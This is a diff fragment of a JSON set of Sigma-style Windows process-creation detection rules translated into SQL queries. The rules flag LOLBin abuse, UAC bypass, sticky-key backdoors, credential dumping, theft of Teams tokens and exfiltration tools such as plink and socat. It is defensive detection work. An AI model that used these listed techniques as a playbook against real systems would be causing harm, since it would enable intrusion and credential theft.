+ "attack.defense_evasion" ], "falsepositives": [ - "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" ], - "filename": "proc_creation_win_servu_susp_child_process.yml" + "filename": "proc_creation_win_regini_ads.yml" }, { - "title": "Exploit for CVE-2017-8759", - "id": "fdd84c68-a1f6-47c9-9477-920584f94905", + "title": "Exfiltration and Tunneling Tools Execution", + "id": "c75309a3-59f8-4a8d-9c2c-4c927ad50555", "status": "test", - "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", - "author": "Florian Roth (Nextron Systems)", + "description": "Execution of well known tools for data exfiltration and tunneling", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.exfiltration", + "attack.command_and_control", + "attack.t1041", + "attack.t1572", + "attack.t1071.001" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using tools" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\socat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\stunnel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\httptunnel.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2017_8759.yml" + "filename": "proc_creation_win_exfiltration_and_tunneling_tools_execution.yml" }, { - "title": "Suspicious Runscripthelper.exe", - "id": "eca49c87-8a75-4f13-9c73-a5a29e845f03", + "title": "Suspicious Dump64.exe Execution", + "id": "129966c9-de17-4334-a123-8b58172e664d", "status": "test", - "description": "Detects execution of powershell scripts via Runscripthelper.exe", - "author": "Victor Sergeev, oscd.community", + "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", + "author": "Austin Songer @austinsonger, Florian Roth", "tags": [ - "attack.execution", - "attack.t1059", - "attack.defense_evasion", - "attack.t1202" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dump64.exe in other folders than the excluded one" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Runscripthelper.exe' ESCAPE '\\' AND CommandLine LIKE '%surfacecheck%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_runscripthelper.yml" + "filename": "proc_creation_win_lolbin_dump64.yml" }, { - "title": "Potential PowerShell Execution Via DLL", - "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", + "title": "Proxy Execution Via Explorer.exe", + "id": "9eb271b9-24ae-4cd4-9465-19cfc1047f3e", "status": "test", - "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", - "author": "Markus Neis, Nasreddine Bencherchali", + "description": "Attackers can use explorer.exe for evading defense mechanisms", + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate explorer.exe run from cmd.exe" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%explorer.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_dll_execution.yml" + "filename": "proc_creation_win_explorer_lolbin_execution.yml" }, { - "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", - "id": "245f92e3-c4da-45f1-9070-bc552e06db11", + "title": "Sticky Key Like Backdoor Execution", + "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", "status": "test", - "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", - "author": "Bhabesh Raj", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.initial_access", - "attack.execution", - "attack.t1190", - "attack.t1059" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" + "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" }, { - "title": "Potential WinAPI Calls Via CommandLine", - "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", + "title": "Service Registry Key Deleted Via Reg.EXE", + "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", "status": "experimental", - "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_inline_win_api_access.yml" + "filename": "proc_creation_win_reg_delete_services.yml" }, { - "title": "Lolbin Ssh.exe Use As Proxy", - "id": "7d6d30b8-5b91-4b90-a891-46cccaf29598", + "title": "Use of Wfc.exe", + "id": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", "status": "experimental", - "description": "Detect usage of the \"ssh.exe\" binary as a proxy to launch other programs", - "author": "frack113, Nasreddine Bencherchali", + "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1127" ], "falsepositives": [ - "Legitimate usage for administration purposes" + "Legitimate use by a software developer" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\OpenSSH\\\\sshd.exe' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND (CommandLine LIKE '%ProxyCommand=%' ESCAPE '\\' OR (CommandLine LIKE '%PermitLocalCommand%' ESCAPE '\\' AND CommandLine LIKE '%LocalCommand%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wfc.exe' ESCAPE '\\' OR OriginalFileName = 'wfc.exe'))" ], - "filename": "proc_creation_win_lolbin_ssh.yml" + "filename": "proc_creation_win_lolbin_wfc.yml" }, { - "title": "UAC Bypass Using PkgMgr and DISM", - "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", - "status": "test", - "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Command With Teams Objects Paths", + "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "status": "experimental", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" + "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" }, { - "title": "New Port Forwarding Rule Added Via Netsh.EXX", - "id": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", - "status": "test", - "description": "Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule", - "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", + "title": "Potential Recon Activity Using DriverQuery.EXE", + "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", + "status": "experimental", + "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.discovery" ], "falsepositives": [ - "Legitimate administration activity", - "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%interface%' ESCAPE '\\' AND CommandLine LIKE '%portproxy%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%v4tov4%' ESCAPE '\\') OR (CommandLine LIKE '%connectp%' ESCAPE '\\' AND CommandLine LIKE '%listena%' ESCAPE '\\' AND CommandLine LIKE '%c=%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_port_forwarding.yml" + "filename": "proc_creation_win_driverquery_recon.yml" }, { - "title": "Suspicious Control Panel DLL Load", - "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", - "status": "test", - "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Exploitation Attempt From Office Application", + "id": "868955d9-697e-45d4-a3da-360cefd7c216", + "status": "experimental", + "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", + "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" }, { - "title": "PUA - AdFind Suspicious Execution", - "id": "9a132afa-654e-11eb-ae93-0242ac130002", - "status": "test", - "description": "Detects AdFind execution with common flags seen used during attacks", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", + "title": "Powershell ChromeLoader Browser Hijacker", + "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", + "status": "experimental", + "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", + "author": "Aedan Russell, frack113 (sigma)", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.persistence", + "attack.t1176" ], "falsepositives": [ - "Legitimate admin activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_adfind_susp_usage.yml" + "filename": "proc_creation_win_browsers_chrome_load_extension.yml" }, { - "title": "Microsoft Workflow Compiler Execution", - "id": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d", - "status": "test", - "description": "Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.", - "author": "Nik Seetharaman, frack113", + "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", + "id": "ef61af62-bc74-4f58-b49b-626448227652", + "status": "experimental", + "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1127", - "attack.t1218" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate MWC use (unlikely in modern enterprise environments)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR OriginalFileName = 'Microsoft.Workflow.Compiler.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_workflow_compiler.yml" + "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" }, { - "title": "Potential System Information Discovery Via Wmic.EXE", - "id": "9d5a1274-922a-49d0-87f3-8c653483b909", + "title": "PUA - Advanced IP Scanner Execution", + "id": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", "status": "experimental", - "description": "Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,\nincluding OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,\nand GPU driver products/versions.\nSome of these commands were used by Aurora Stealer in late 2022/early 2023.\n", - "author": "TropChaud", + "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", + "author": "Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy", "tags": [ "attack.discovery", - "attack.t1082" + "attack.t1046", + "attack.t1135" ], "falsepositives": [ - "Unknown" + "Legitimate administrative use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'WMI Commandline Utility' OR OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '%cpu get name%' ESCAPE '\\' OR CommandLine LIKE '%MEMPHYSICAL get MaxCapacity%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get product%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get version%' ESCAPE '\\' OR CommandLine LIKE '%bios get SMBIOSBIOSVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get name%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get DriverVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get VideoModeDescription%' ESCAPE '\\' OR CommandLine LIKE '%OS get Caption,OSArchitecture,Version%' ESCAPE '\\' OR CommandLine LIKE '%DISKDRIVE get Caption%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\advanced\\_ip\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_ip\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced IP Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_system_info_discovery.yml" + "filename": "proc_creation_win_pua_advanced_ip_scanner.yml" }, { - "title": "Share And Session Enumeration Using Net.EXE", - "id": "62510e69-616b-4078-b371-847da438cc03", - "status": "stable", - "description": "Detects attempts to enumerate file shares, printer shares and sessions using \"net.exe\" with the \"view\" flag.", - "author": "Endgame, JHasenbusch (ported for oscd.community)", + "title": "SQL Client Tools PowerShell Session Detection", + "id": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", + "status": "test", + "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", + "author": "Agro (@agro_sev) oscd.communitly", + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1127" + ], + "falsepositives": [ + "Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action." + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\sqltoolsps.exe' ESCAPE '\\') AND NOT (ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_mssql_sqltoolsps_susp_execution.yml" + }, + { + "title": 